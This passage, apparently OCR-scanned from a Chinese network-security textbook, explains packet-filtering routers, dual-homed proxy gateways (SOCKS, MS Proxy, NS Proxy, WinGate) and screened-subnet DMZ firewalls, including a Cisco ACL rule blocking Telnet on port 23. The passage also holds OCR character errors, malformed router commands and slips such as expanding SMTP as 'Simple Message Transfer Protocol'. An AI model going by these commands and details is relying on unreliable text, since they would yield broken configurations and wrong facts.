包 过 滤 路 由 器 使 得 路 由 器 能 够 根据 特定 的 服务 允许 或 拒绝 流动 的 数据 ,因为 多 数 服务 
监听 者 都 在 已 知 的 TCP/UDP 端口 号 上 。 例如 ,终端 仿真 (Telnet) 服 务 器 在 TCP 的 23 号 
端口 上 监听 远程 连接 ,而 邮件 传输 (Simple Message Transfer Protocol, SMTP) 服 务 器 在 
TCP 的 25 号 端口 上 监听 连接 。 如 果 管 理 员 希望 阻塞 所 有 进入 的 Telnet 连接 ,过 滤 规则 只 
需 简单 地 设置 为 丢弃 所 有 TCP 端口 号 等 于 23 的 数据 包 。 

下 面 举例 说 明 (Cisco IOS) : 


/* 首先 进入 配置 状态 */ 

Router A# configure term 

/* 对 于 传输 层 端口 控制 * / 

Router A(conf)# ip access— list extended 101 

/* 禁 止 所 有 对 172.16.1.1 的 23 端口 访问 * / 

Router A(conf)# deny tcp any 172.16.1.1 0.0.0.0 eq 23 
/x* 人 允许 ICMP*/ 

Router A(conf)# permit icmp 

/* 为 ACL 指定 适用 接口 并 启用 ACL*/ 
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Router A(conf)# int s0/0 

/* 指定 该 规则 是 对 输入 信息 还 是 对 输出 信息 起 作用 * / 

Router A(conf)# ip access group 101 out/in 

对 于 比较 小 的 系统 而 言 , 可 以 采用 包 过 滤 型 防火 墙 ,这 是 因为 以 下 几 个 原因 : 

。 包 过 滤 防 火 墙 工 作 在 网 络 层 , 根 据 数据 包 的 报头 部 分 进行 判断 处 理 , 不 去 分 析 数 据 
部 分 ,因此 处 理 包 的 速度 比较 快 。 

。 实施 费用 低廉 ,因为 一 般 路 由 器 中 已 经 内 置 了 包 过 滤 功 能 。 因 此 ,通过 路 由 器 接 人 
Internet 的 用 户 无 须 另外 购买 ,可 以 直接 设置 并 使 用 。 

。 包 过 滤 路 由 器 对 用 户 和 应 用 来 讲 是 透明 的 ,用 户 可 以 不 知道 包 过 滤 防 火 墙 的 存在 ， 
也 不 需要 对 客户 端 进 行 变更 。 所 以 不 必 对 用 户 进行 特殊 的 培训 ,也 不 需要 在 每 台 
机 上 安装 特定 的 软件 。 

但 是 , 包 过 滤 型 防火 墙 也 存在 一 些 缺 点 : 

。 定义 数据 包 过 滤 规 则 复杂 。 因 为 系统 管理 员 需 要 对 各 种 Internet 服务 (如 FTP、 
Telnet 等 ) ,报头 格式 以 及 每 个 域 的 含义 有 非常 深入 的 理解 。 

。 只 能 阻止 一 种 类 型 的 IP 欺骗 。 外 部 主机 伪装 内 部 主机 的 IP, 不 能 防止 外 部 主机 伪 
装 其 他 可 信任 的 外 部 主机 的 IP。 如 用 户主 机 A 信任 外 部 主机 B, 攻 击 者 C 无 法 通 
过 伪装 A 的 IP 地 址 来 通过 包 过 滤 防 火 墙 ,但 是 ,他 可 以 伪装 成 A 所 信任 的 BB 主机 
的 IP 地 址 ,堂而皇之 地 通过 防火 墙 (因为 B 是 A 所 信任 的 ,因此 所 有 B 主机 发 往 防 
火 墙 的 数据 包 根 据 过 滤 规 则 应 该 允许 通过 ) 。 

。 直接 经 过 路 由 器 的 数据 包 都 有 被 用 做 数据 驱动 式 攻 击 的 潜在 危险 。 数 据 驱动 式 攻 
击 从 表面 上 来 看 是 由 路 由 器 转发 到 内 部 主机 上 没有 害处 的 数据 ,但 数据 中 包括 了 一 
些 隐藏 的 指令 ,能够 让 主机 修改 访问 控制 和 与 安全 有 关 的 文件 ,使 得 攻击 者 能 够 获 
得 对 系统 的 访问 权 。 

。 不 支持 用 户 认 证 方式 。 用 户 认证 一 般 通过 账号 和 口令 来 判别 用 户 的 身份 ,这 需要 在 
网 络 层 之 上 的 层 完成 。 而 包 过 滤 路 由 器 工作 在 网 络 层 ,因此 ,一 般 的 包 过 滤 防 火 墙 
基本 是 通过 IP 地 址 来 判别 是 否 允许 通过 ,而 IP 地 址 是 可 以 伪造 的 (如 伪造 成 受信 
任 的 外 部 主机 地 址 ) ,因此 如 果 没 有 基于 用 户 的 认证 , 仅 通过 IP 地 址 来 判断 是 不 安 
全 的 。 

。 不 能 提供 完整 的 日 志 。 因 为 路 由 器 本 身 的 存储 容量 有 限 , 如 果 需 要 完整 的 日 志 , 必 
须 定 时 从 路 由 器 取得 再 进行 处 理 , 这 需要 相应 的 软件 系统 进行 处 理 。 

。 吞吐 量 会 受 影响 。 随 着 过 滤 规 则 的 复杂 化 和 通过 路 由 器 进行 处 理 的 数据 包 数 目的 
增加 ,路 由 器 的 吞吐 量 会 下 降 。 路 由 器 本 身 的 目的 是 为 了 进行 路 由 选择 、 分 组 转发 。 
过 滤 机 制 附加 在 路 由 器 上 ,一 旦 过 滤 规 则 复杂 化 ,对 每 个 经 过 路 由 器 进行 转发 的 数 
据 包 都 需要 进行 复杂 的 判断 ,无 疑 会 大 大 增加 路 由 器 的 负载 。 因 此 ,一 般 建 议 将 过 
滤 规 则 尽量 简单 化 ,去 除 一 些 可 能 是 交叉 重复 的 过 滤 规 则 。 

。 IP 包 过 滤器 无 法 对 网 络 上 流动 的 信息 提供 全 面 的 控制 。 因 为 包 过 滤 路 由 器 一 般 通 
过 IP 地址、 端口 号 等 数据 包头 部 信息 进行 判断 ,能 够 允许 或 拒绝 特定 的 服务 ,但 是 
不 能 理解 特定 服务 的 上 下 文 环境 和 数据 , 即 它 不 对 数据 包 的 正文 部 分 进行 分 析 。 

所 以 ,在 大 型 系统 中 ,一 般 不 建议 仅 采用 路 由 器 作为 防火 墙 ,而 是 采用 专用 的 硬件 防 
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火 墙 。 

4.2.3.2 双 宿 网 关 防 火 墙 

包 过 滤 防 火 墙 通过 在 路 由 器 上 设置 过 滤 规 则 来 实现 对 进出 网 络 的 报 文 进行 控制 ,如 果 
过 滤 规 则 过 于 庞大 ,那么 路 由 器 的 负担 就 较 重 ,而 且 包 过 滤 防 火 墙 只 能 在 网 络 层 进 行 防护 。 
对 包 过 滤 防 火 墙 的 改进 是 引入 双 宿 网 关 的 概念 。 

双 宿 网 关 是 一 种 拥有 两 个 连接 到 不 同 网 络 上 的 网 络 接口 的 防火 墙 。 双 宿 网 关 防 火 墙 又 
称 为 双重 宿主 主机 防火 墙 。 例 如 ,一 个 网 络 接口 连 到 外 部 的 不 可 信任 的 网 络 上 , 另 一 个 网 络 
接口 连接 到 内 部 可 信任 的 网 络 上 。 双 宿 网 关 防火 培 的 构造 如 图 4. 6 所 示 。 
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图 4.6 双 宿 网 关 防火 墙 构造 示意 图 


这 种 防火 墙 的 最 大 特点 是 内 部 网 络 与 外 部 不 可 信任 的 网 络 之 间 是 隔离 的 ,两 者 不 能 直 
接 进行 通信 。 那 么 ,两 个 网 络 之 间 的 如 何 进行 通信 呢 ? 双重 宿主 主机 用 两 种 方式 来 提供 服 
务 , 一 种 是 用 户 直接 登录 到 双重 宿主 主机 上 来 提供 服务 , 另 一 种 是 在 双重 宿主 主机 上 运行 代 
理 服务 器 。 第 一 种 方式 需要 在 双重 宿主 主机 上 开 许 多 账号 (每 个 需要 外 部 网 络 的 用 户 都 需 
要 一 个 账号 ) ,但 是 这 样 做 又 是 很 危险 的 。 这 是 因为 : 
。 用 户 账号 的 存在 会 给 入 侵 者 提供 相对 容易 的 入侵 通道 ,而 一 般 用 户 往往 将 自己 的 密 
码 设置 为 电话 号 码 .生日 .吉祥 数字 等 ,这 使 得 入侵 者 很 容易 破解 ,如 果 和 侵 者 再 使 
用 一 些 破解 密码 的 辅助 工具 ,如 字典 破解 ,强行 搜 索 或 网 络 窃听 等 ,那么 后 果 不 堪 
设想 。 
。 如 果 双 重 宿 主 主机 上 有 很 多 账号 ,不 利于 管理 员 进行 维护 。 
。 因为 用 户 的 行为 是 不 可 预知 的 ,如 双重 宿主 主机 上 有 很 多 用 户 账户 ,这 会 给 入 侵 检 
测 带 来 很 大 的 麻烦 。 
基于 以 上 考虑 , 双 宿 主 主机 一 般 采 用 代理 方式 提供 服务 。 采 用 代理 服务 的 双 宿 主 主 机 
一 般 也 称 为 代理 服务 器 。 下 面 主要 讨论 这 种 方式 。 
代理 服务 器 (proxy Server) 是 接收 或 解释 客户 端 连接 并 发 起 到 服务 器 的 新 连接 的 网 络 
节点 。 代 理 服务 器 是 客户 /服务 器 关系 的 中 间 人 。 内 部 网 络 可 以 通过 代理 服务 器 连接 到 
Internet, 它 允许 内 部 客户 端 使 用 常用 的 应 用 程序 如 Web 浏览 器 和 FTP 客户 端 访问 
Internet。 而 代理 服务 器 使 用 单个 合法 IP 地 址 处 理 所 有 的 发 出 请 求 , 因 此 无 论 客 户 端 是 否 
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具有 合法 IP 地 址 都 允许 访问 Internet。 我 们 知道 网 桥 和 交换 器 是 在 数据 链 路 层 上 将 帧 从 
一 端 传输 到 另 一 端 ,路 由 器 在 网 络 层 上 转发 IP 包 。 而 代理 服务 器 则 是 在 传输 层 以 上 智能 地 
连接 客户 端 和 服务 器 ,并 能 够 检查 IP 包 , 加 以 分 析 , 最 终 按照 包 的 内 容 采取 相应 的 步骤 。 同 
时 ,代理 服务 器 可 支持 对 用 户 授权 ,决定 哪些 用 户 可 以 访问 哪些 外 部 的 资源 ,有 的 代理 服务 
器 还 支持 双向 代理 , 即 允 许 外 部 的 用 户 经 授权 能 够 访问 内 部 的 主机 资源 。 

代理 服务 器 主要 有 以 下 几 个 用 途 : 

。 节约 IP 地 址 。RFC 1918( 私 用 Internet 地 址 分 配 文档 ) 建 议 在 局 域 网 中 尽量 使 用 私 
有 IP 地 址 ,以 节省 公用 合法 IP 地 址 , 即 在 局 域 网 中 分 配 足 以 连接 到 Internet 的 合 
法 IP 地 址 就 可 以 了 。 这 有 助 于 节约 申请 合法 IP 地 址 的 资金 ,同时 提高 局 域 网 的 安 
全 性 ,因为 外 部 网 络 不 能 直接 访问 内 部 的 私有 IP 地 址 。 

。 通过 缓存 能 够 加 快 浏览 速度 。 为 了 节省 网 络 带 宽 , 减 少 局 域 网 连接 Internet 的 网 络 
流量 ,可 在 代理 服务 器 中 设置 缓存 。 具 有 缓存 功能 的 代理 服务 器 能 够 检查 客户 端 请 
求 是 否 已 在 本 地 代理 服务 器 中 缓存 ,以 决定 是 直接 从 代理 服务 器 发 出 响应 还 是 建立 
到 Internet 上 的 新 连接 。 一 般 流行 的 代理 服务 器 均 缓存 HTTP 协议 ,有 的 还 可 组 
存 FTP 协议 。 

。 较 好 的 安全 性 。 在 代理 服务 器 中 设置 安全 控制 策略 ,提供 认证 和 授权 ,可 以 阻止 
Internet 上 非法 用 户 访问 内 部 网 ,以 保护 内 部 的 资源 ,此 时 代理 服务 器 又 具有 防火 
墙 的 功能 。 

。 可 以 进行 过 滤 。 可 在 代理 服务 器 中 设置 过 滤 策 略 以 过 滤 客户 端的 请 求 ,减少 不 必要 
的 Internet 连接 。 过 滤 有 不 同 层次 ,可 根据 用 户 名 、 源 和 目的 地 址 以 及 按照 内 容 实 
现 过 滤 ,集成 病毒 防火 墙 功能 的 代理 服务 器 甚至 能 扫描 内 容 中 存在 的 病毒 。 

。 强大 的 日 志 功 能 。 由 于 Internet 通信 都 通过 代理 服务 器 ,因此 代理 服务 器 能 够 记 住 
处 理 的 所 有 请 求 和 传递 的 流量 ,并 将 其 保存 在 日 志文 件 中 ,以 便 统计 、 分 析 各 个 用 户 
的 使 用 情况 ,最 后 进行 流量 记 费 。 

。 对 服务 器 主机 的 依赖 性 高 。 一 旦 代理 服务 器 被 攻击 者 破坏 , 则 内 部 网 与 外 部 网 之 间 
的 连接 将 被 中 断 。 

一 般 而 言 , 对 于 小 型 系统 或 者 系统 中 的 部 分 区 域 ,可 以 采用 双 宿 网 关 防火 墙 来 进行 内 外 

网 的 隔离 。 
根据 代理 服务 器 工作 的 层次 ,一般 可 分 为 应 用 层 代 理 、 传 输 层 代理 和 SOCKS 代理 。 
(1) 应 用 层 代理 。 
应 用 层 代 理工 作 在 TCP/IP 模型 的 应 用 层 之 上 , 它 在 客户 端 和 服务 器 中 间 转 发 应 用 数 
据 , 而 对 应 用 层 以 下 的 数据 透明 。 应 用 层 代 理 服务 器 用 于 支持 代理 的 应 用 层 协 议 , 如 
HTTP。 由 于 这 类 协议 支持 代理 ,因此 只 要 在 客户 端 中 的 代理 服务 器 配置 中 设置 好 代理 服 
务 器 的 地 址 ,客户 端的 所 有 请 求 将 自动 转发 到 代理 服务 器 中 ,然后 由 代理 服务 器 处 理 或 转发 
该 请 求 。 这 种 应 用 层 的 代理 支持 的 协议 包括 HTTP、FTP、Telnet 等 。 

(2) 传输 层 代理 。 

应 用 层 代理 必须 有 相应 的 协议 支持 ,如 果 该 协议 不 支持 代理 ,那么 它 就 无 法 使 用 应 用 层 
代理 ,如 SMTP、POP 等 。 对 于 这 类 协议 唯一 的 办 法 是 在 应 用 层 以 下 代理 , 即 传输 层 代 理 。 
与 应 用 层 代 理 不 同 ,传输 层 代 理 服务 器 能 够 接收 内 部 网 的 TCP 和 UDP 包 并 将 其 发 送 到 外 
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部 网 ,重新 发 送 包 时 源 IP 和 目的 IP 甚至 TCP 或 UDP 头 ( 取 决 于 代理 服务 器 的 配置 ) 都 可 
能 要 改变 。 传 输 层 代理 要 求 代 理 服 务 器 具有 真正 服务 器 的 部 分 功能 : 监听 特定 TCP 或 
UDP 端口 ,接收 客户 端的 请 求 , 同 时 向 客户 端 发 出 相应 的 响应 。 

(3) SOCKS 代理 。 

SOCKS 代理 是 可 用 的 最 强大 、 最 灵活 的 代理 标准 协议 。 它 允许 代理 服务 器 内 部 的 客 
户 端 完全 地 连接 到 代理 服务 器 外 部 的 服务 器 ,而 且 它 对 客户 端 提 供 授 权 和 认证 ,因此 它 也 是 
一 种 安全 性 较 高 的 代理 。 

SOCKS 包括 两 部 分 : 

。 SOCKS 服务 器 。 

。 SOCKS 客户 端 。 

参照 OSI 的 7 层 参 考 模型 ,SOCKS 服务 器 在 OSI 的 应 用 层 实现 ,SOCKS 客户 端 在 
OSI 的 应 用 层 和 传输 层 之 间 实 现 。SOCKS 是 一 种 非常 强大 的 电路 级 网 关 防 火 墙 ,使 用 
SOCKS 代理 ,应 用 层 不 需要 作 任 何 改变 ,但 是 客户 端 需要 专用 的 程序 , 即 如 果 一 个 基于 
TCP 的 应 用 需要 通过 SOCKS 代理 进行 中 继 , 首先 必须 将 客户 端 程序 SOCKS 化 
(CSOCKSified) 。 

当 一 个 主机 需要 连接 应 用 程序 服务 器 时 , 它 先 通过 SOCKS 客户 端 连接 到 SOCKS 代理 
服务 器 。 这 个 代理 服务 器 将 代表 该 主机 连接 应 用 程序 服务 器 ,并 在 主机 和 应 用 程序 服务 器 
之 间 中 继 数据 。 对 于 应 用 程序 服务 器 ,SOCKS 代理 服务 器 相当 于 客户 端 。 

目前 SOCKS 有 两 个 版 本 ,SOCKS v4 和 SOCKS v5。 

SOCKS v4 为 基于 TCP 的 客户 /服务 器 应 用 程序 提供 了 一 种 不 安全 的 穿越 防火 墙 的 机 
制 ,包括 Telnet、FTP 和 当前 最 流行 的 信息 查询 协议 ,如 HTTP、WAIS 和 Gopher。 

SOCKS v5 协议 是 为 了 包括 对 UDP 的 支持 而 对 SOCKS v4 的 扩展 ,为 了 包括 对 一 般 环 
境 下 更 强 的 认证 机 制 的 支持 而 扩展 了 协议 架构 ,为 了 包括 对 域名 和 IPv6 地 址 的 支持 而 扩展 
了 地 址 集 。 

由 于 SOCKS 的 简单 性 和 可 伸缩 性 ,SOCKS 已 经 广泛 地 作为 标准 代理 技术 应 用 于 内 部 
网 络 对 外 部 网 络 的 访问 控制 。SOCKS 的 主要 特性 如 下 : 

。 简便 的 用 户 认证 和 建立 通信 信道 。SOCKS 协议 在 建立 每 一 个 TCP 或 UDP 通信 信 
道 时 ,都 把 用 户 信息 从 SOCKS 客户 端 传输 到 SOCKS 服务 器 进行 用 户 认证 ,从 而 保 
证 了 TCP 或 UDP 信道 的 完整 性 和 安全 性 。 而 大 多 数 协议 把 用 户 认证 处 理 与 通信 
信道 的 建立 分 开 ,一 旦 协议 建立 多 个 信道 ,就 难以 保证 信道 的 完整 性 和 安全 性 。 
SOCKS 与 具体 应 用 无 关 。 作 为 代理 软件 ,SOCKS 协议 建立 通信 信道 ,为 上 层 提 供 
代理 服务 。 当 新 的 应 用 出 现时 ,SOCKS 不 需要 任何 扩展 就 可 进行 代理 。 而 应 用 层 
代理 在 有 新 应 用 出 现时 需要 有 新 的 代理 软件 。 开 发 者 必须 在 新 应 用 协议 正式 公 
后 才能 开发 代理 软件 ,并 且 需 要 为 每 一 个 新 应 用 开发 相应 的 代理 程序 。 
灵活 的 访问 控制 策略 。IP 路 由 器 在 IP 层 通过 IP 包 的 路 由 控制 网 络 访问 ,SOCKS 
在 TCP 或 UDP 层 控制 TCP 或 UDP 连接 。 它 可 以 与 IP 路 由 器 防火 墙 一 起 工作 ， 
也 可 以 独立 工作 。SOCKS 的 访问 控制 策略 可 基于 用 户 、 应 用 、 时 间 、 源 地 址 和 目的 
地 址 ,加 强 了 控制 的 灵活 性 ,能 更 好 地 控制 网 络 访问 。 

。 支持 双向 代理 。 大 多 数 的 代理 机 制 (例如 网 络 地 址 解析 (NAT)) 只 支持 单 向 代理 ， 
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即 从 内 部 网 络 到 外 部 网 络 (Internet) ,代理 根据 IP 地 址 (可 路 由 的 ) 建 立 通信 信道 。 
这 些 代理 机 制 不 能 代理 需要 建立 返回 数据 通道 的 应 用 (例如 多 媒体 应 用 )。IP 层 的 
代理 对 于 使 用 多 数据 通道 的 应 用 需要 附加 的 功能 模块 来 处 理 。 而 SOCKS 通过 域 
名 来 确定 通信 目的 地 ,克服 了 使 用 私有 IP 地 址 的 限制 。SOCKS 能 够 使 用 域名 在 不 
同 的 局 域 网 间 建 立 通信 信道 。 
目前 市 场 上 代理 服务 器 产品 较 多 ,其 中 比较 流行 的 有 Microsoft Proxy Server( 简 称 MS 
Proxy)、Netscape Proxy Server( 简 称 NS Proxy)、WinGate、SyGate 等 。 前 两 种 代理 服务 器 
是 综合 性 的 产品 ,不 仅 可 作为 代理 服务 器 ,而 且 还 可 作为 防火 墙 ,对 大 、 中 、 小 型 企业 局 域 网 
均 适用 。 而 后 面 两 种 产品 则 是 单一 、 小 型 的 代理 服务 器 。 下 面 主 要 介绍 其 中 3 种 : MS 
Proxy\NS Proxy、WinGate。 
1. MS Proxy 
MS Proxy 既是 一 个 代理 也 是 一 个 防火 墙 , 它 可 代理 目前 Internet 上 流行 的 各 种 协议 ， 
同时 提供 用 户 认 证 和 授权 。 它 支持 应 用 层 代理 ,传输 层 代 理 和 SOCKS 代理 ,同时 提供 逆向 
代理 服务 。 它 不 仅 对 HTTP 提供 缓存 ,而且 还 对 FTP 提供 缓存 ,此 外 它 可 将 代理 服务 器 中 
的 日 志文 件 自动 转 存 人 SQL Server 数据 库 中 。 
MS Proxy 的 一 个 显著 特点 是 多 个 MS Proxy 可 组 成 阵列 (array) 或 链 式 (chain) 结 构 ， 
这 种 结构 对 大 型 企业 网 特别 有 用 ,因为 它 可 提高 代理 服务 器 的 容错 性 ,减少 故障 发 生 率 。 而 
且 这 种 结构 可 使 得 代理 服务 器 能 够 提供 层次 和 分 布 式 缓存 功能 ,代理 服务 器 之 间 可 以 根据 
ICP(Internet 缓存 协议 , 它 允 许 一 组 代理 服务 器 共享 彼此 的 缓存 文档 ) 使 得 代理 服务 器 之 间 
的 负载 均衡 。 同 时 这 种 结构 也 增强 了 局 域 网 和 代理 服务 器 的 可 扩展 性 。 
作为 MTS(Microsoft Transaction Server) 的 一 个 组 件 ,MS Proxy 必须 与 NT Server 一 
同 使 用 ,实际 上 它 与 IIS (Internet Information Server) 绑 定 , 由 MMC (Microsoft 
Management Console) 统 一 管理 。MS Proxy 可 对 客户 端 进行 用 户 管理 ,控制 和 过 滤 。 它 的 
用 户 与 NT Server 主 域 的 用 户 一 致 。 因 此 ,MS Proxy 只 对 NT Server 域 的 用 户 提 供 代 
理 服 务 。 
除 此 之 外 ,MS Proxy 支持 透明 连接 , 它 允 许 客户 端 用 户 使 用 自己 喜欢 的 应 用 程序 ,而 
不 必 为 代理 服务 器 作 任 何 配置 。 为 了 实现 这 个 目的 ,MS Proxy 需 在 客户 端 安 装 其 客户 端 
组 件 。 在 安装 时 安装 程序 首先 重新 命名 客户 端 已 有 的 WinSock DLL 文件 ,接着 将 新 的 代 
理 DLL 文件 装 人 客户 端 。 这 个 代理 DLL 接收 客户 端的 所 有 Socket 请 求 ,决定 该 请 求 是 否 
转发 给 MS Proxy。 如 果 应 用 程序 (如 浏览 器 ) 用 WinSock 代理 访问 外 部 Internet, 则 代理 
DLL 就 会 将 API 请 求 转发 给 MS Proxy; 如 果 访 问 内 部 局 域 网 ,该 请 求 就 转发 给 已 重 命名 
的 WinSock DLL。 上 述 处 理 增加 了 网 络 调用 的 额外 开销 ,同时 也 增加 了 故障 发 生 的 可 
能 性 。 
2. NS Proxy 


NS Proxy 拥有 许多 关于 代理 应 用 通信 的 功能 。 这 些 功能 有 助 于 认证 用 户 ,提高 网 络 性 
能 ,简化 实现 ,以 及 提高 扩展 性 。 其 中 最 著名 的 功能 有 Windows NT 域 同步 .自动 代理 配 
置 . 复 管 理 和 北向 代理 。 

NS Proxy 对 轻 量 目录 访问 协议 (LDAP) 提 供 支 持 。LDAP 支持 集中 认证 的 用 户 名 和 
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口令 , 它 使 用 TCP 端口 636 进行 网 络 通信 。NS Proxy 不 允许 Windows NT 域 直 接 对 客户 
进行 认证 。 然 而 , 它 允 许 LDAP 数据 库 与 Windows NT 域 保 持 同 步 , 使 得 NT 用 户 在 两 种 
类 型 的 认证 中 使 用 同样 的 用 户 名 和 口令 。 

为 了 减轻 客户 端的 复杂 配置 , NS Proxy 对 自动 代理 配置 (Automatic Proxy 
Configuration, APC) 提供 支持 ,大 大 简化 了 Netscape Navigator 或 Microsoft Internet 
Explorer 使 用 代理 服务 器 的 配置 过 程 。APC 得 到 了 主要 代理 服务 器 提供 商 的 支持 。 

配置 大 型 代理 服务 器 阵列 时 ,作为 一 个 单位 管理 一 组 服务 器 很 关键 。NS Proxy 通过 簇 
管理 (clustered management) 实 现 了 这 一 功能 。 簇 管理 提供 了 如 下 功能 : 

。 启动 .终止 或 重启 动 代理 服务 器 阵列 。 

。 在 整个 服务 器 阵列 上 一 次 性 传输 配置 文件 。 

。 自动 组 合 阵 列 服务 器 上 的 错误 和 日 志文 件 。 

NS Proxy 扩展 了 HTTP 缓存 功能 ,能 够 动态 决定 哪 一 页 缓存 最 长 。Netscape 产品 将 
缓存 安全 文档 并 在 本 地 代理 服务 器 系统 中 进行 存储 。 然 而 它 需 要 远程 服务 器 认证 每 一 个 请 
求 文档 的 用 户 。 这 是 方便 性 与 安全 性 的 一 个 折 中 : 系统 非常 方便 ,因为 它 允 许 更 快 地 返回 
安全 文档 ; 而 它 并 不 安全 ,因为 这 些 文档 被 存储 在 本 地 服务 器 的 缓存 中 , 比 在 远程 Web 服 
务 器 上 要 危险 得 多 。 

与 所 有 的 Netscape 产品 一 样 ,NS Proxy 设计 时 考虑 了 可 扩展 性 。 通 过 使 用 分 层 缓存 ， 
NS Proxy 能 够 将 多 个 代理 服务 器 作为 一 个 整体 组 使 用 。 因 此 它 能 够 更 有 效 地 利用 代理 服 
务 器 阵列 。 分 层 缓存 能 够 使 用 用 户 IP 地 址 代替 服务 器 IP 地 址 转发 请 求 。 通 常 ,在 发 送 请 
求 时 ,代理 服务 器 以 自己 的 地 址 代替 客户 端 IP 地 址 。 为 了 保证 管理 员 在 网 络 中 需要 用 到 的 
源 IP 过 滤 及 其 他 网 络 功能 ,NS Proxy 提供 了 客户 端 IP 转发 功能 。 

NS Proxy 还 支持 在 企业 网 中 考虑 智能 分 布 缓存 的 缓存 阵列 路 由 协议 (Cache Array 
Routing Protocol,CARP)。 与 MS Proxy 2.0 只 支持 SOCKS v4 不 同 的 是 ,NS Proxy 还 支 
持 SOCKS v5 ,除了 Windows NT, 它 还 可 用 于 Digital UNIX HP-UX Solaris、AIX 等 平台 。 

3. WinGate 

虽然 MS Proxy 在 中 型 及 大 型 环境 中 都 发 展 得 很 快 .但 对 于 小 型 企业 网 来 讲 , 它 仍 不 大 
实用 。 因 为 它 价 格 昂贵 ,对 硬件 要 求 很 高 ,同时 必须 与 Windows NT 一 同 使 用 ,而 且 代 理 的 
速度 较 慢 。WinGate 正好 弥补 了 MS Proxy 的 上 述 缺 点 , 它 是 小 型 局 域 网 的 首选 产品 。 

WinGate 支持 目前 Internet 上 流行 的 大 多 数 协议 , 提供 应 用 层 、 传 输 层 以 及 SOCKS 
3 种 代理 服务 。 它 能 够 运行 于 Windows 95、Windwos NT Workstation、Windwos NT 
Server 且 占 用 内 存 少 。 对 HTTP 协议 它 还 能 够 提供 较为 简单 的 内 容 过 滤 ,而 且 代 理 的 速度 
比较 快 。 

作为 小 型 企业 网 的 解决 方案 , WinGate 不 支持 阵列 和 链 式 结构 ,也 不 提供 逆向 代理 。 
另外 ,由 于 它 不 要 求 安装 客户 端 组 件 ,因此 对 于 不 支持 代理 服务 的 应 用 协议 ,如 FTP、SMTP 
和 POP ,客户 端 需要 显 式 地 配置 代理 服务 器 的 地 址 。 

4.2.3.3 屏蔽 子 网 防火 墙 

代理 服务 器 通过 一 台 主 机 进行 内 部 网 络 和 外 部 网 络 之 间 的 隔离 ,因此 ,充当 代理 服务 器 
的 主机 非常 容易 受到 外 部 的 攻击 。 入 侵 者 只 要 破坏 了 这 一 层 的 保护 ,就 可 以 很 容易 地 进入 
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内 部 网 络 。 对 代理 服务 器 的 改进 是 在 内 网 和 外 网 之 间 建 立 一 个 子 网 以 进行 隔离 ,这 种 方式 
称 为 屏蔽 子 网 防火 墙 。 这 个 屏蔽 子 网 区 域 称 为 边界 网 络 (perimeter network) ,也 称 为 非 军 
事 区 (De-Militarized Zone,DMZ) 。 

一 种 典型 的 屏蔽 子 网 防火 墙 体系 如 图 4.7 所 示 。 





外 部 网 络 





图 4.7 屏蔽 子 网 防火 墙 构造 示意 图 


屏蔽 子 网 防火 墙 系统 用 了 两 个 包 过 滤 路 由 器 (内 部 路 由 器 和 外 部 路 由 器 ) 和 一 个 保 垒 主 
机 ,在 定义 了 * 非 军事 区 ”网络 后 ,屏蔽 子 网 防火 墙 支持 网 络 层 和 应 用 层 安全 功能 。 网 络 管理 
员 将 煲 垒 主机、 信息 服务 器 以 及 其 他 公用 服务 器 放 在 * 非 军事 区 ”网 络 中 。“ 非 军事 区 ”网 络 
很 小 ,处 于 Internet 和 内 部 网 络 之 间 。 一 般 情 况 下 ,将 * 非 军事 区 ?配置 成 使 用 Internet, 内 
部 网 络 系统 能 够 访问 “ 非 军事 区 ”网 络 上 数目 有 限 的 系统 ,而 通过 “ 非 军事 区 "网络 直接 进行 
信息 传输 是 严格 禁止 的 。 

对 于 进来 的 信息 ,外 部 路 由 器 启用 包 过 滤 规 则 ,防范 通常 的 外 部 攻击 (如 源 地 址 欺骗 和 
源 路 由 攻击 ) ,并 管理 Internet 到 * 非 军事 区 ?网络 的 访问 。 它 只 允许 外 部 系统 访问 保 垒 主 
机 。 内 部 路 由 器 提供 第 二 层 防 御 ,只 接收 源 于 堡垒 主机 的 数据 包 , 负 责 管 理 * 非 军事 区 ”到 内 
部 网 络 的 访问 。 

对 于 发 往 Internet 的 数据 包 , 内 部 路 由 器 管理 内 部 网 络 到 * 非 军事 区 ”网 络 的 访问 。 它 
只 允许 内 部 系统 访问 堡垒 主机 (还 可 能 有 信息 服务 器 ) 。 外 部 路 由 器 上 的 过 滤 规 则 要 求 使 用 
代理 服务 (只 接收 来 自 堡 又 主机 的 去 往 Internet 的 数据 包 ) 。 

内 部 路 由 器 (又 称 阻塞 路 由 器 ) 位 于 内 部 网 和 "* 非 军事 区 ?之 间 , 用 于 保护 内 部 网 不 受 * 非 
军事 区 ”和 来 自 Internet 的 入侵 , 它 执行 了 大 部 分 的 过 滤 工 作 。 

外 部 路 由 器 还 可 以 防止 部 分 IP 欺骗 ,因为 内 部 路 由 器 分 辩 不 出 一 个 声称 从 “ 非 军事 区 ” 
来 的 数据 包 是 否 真 的 从 * 非 军事 区 ”来 ,而 外 部 路 由 器 很 容易 分 辨 出 真 伪 。 在 堡 全 主机 上 ,可 
以 运行 各 种 各 样 的 代理 服务 器 。 

堡垒 主机 是 最 容易 受 侵 袭 的 ,万 一 发 生 堡垒 主机 被 人 侵 控 制 的 情况 ,对 于 采用 屏蔽 子 网 
的 网 络 体系 结构 ,入 侵 者 仍然 不 能 直接 侵袭 内 部 网 络 ,因为 内 部 网 络 受 到 内 部 过 滤 路 由 器 的 
保护 。 

如 果 没 有 * 非 军事 区 ”, 那 么 人 侵 者 控制 了 堡 公主 机 后 就 可 以 监听 整个 内 部 网 络 的 对 话 。 
如 果 把 堡垒 主机 放 在 * 非 军事 区 ”网 络 上 ,即使 人 侵 者 控制 了 堡垒 主机 ,所 能 侦 听 到 的 内 容 也 
是 有 限 的 , 即 只 能 侦 听 到 周边 网 络 的 数据 ,而 不 能 侦 听 到 内 部 网 上 的 数据 。 内 部 网 络 上 的 数 
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据 包 虽然 在 内 部 网 上 是 广播 式 的 ,但 内 部 过 滤 路 由 器 会 阻止 这 些 数据 包 流 入 * 非 军事 区 ” 
网 络 。 

综 上 所 述 ,内 部 路 由 器 位 于 内 部 网 和 DMZ 之 间 , 它 的 主要 功能 如 下 : 

。 负责 管理 DMZ 到 内 部 网 络 的 访问 。 

。 仅 接 收 来 自 堡 全 主机 的 数据 包 。 

。 完成 防火 墙 的 大 部 分 过 滤 工 作 。 

而 外 部 路 由 器 的 主要 功能 可 以 归纳 如 下 : 

。 防范 通常 的 外 部 攻击 。 

。 管理 Internet 到 DMZ 的 访问 。 

。 只 允许 外 部 系统 访问 保全 主机 。 

堡垒 主机 的 主要 功能 如 下 : 

。 进行 安全 防护 。 

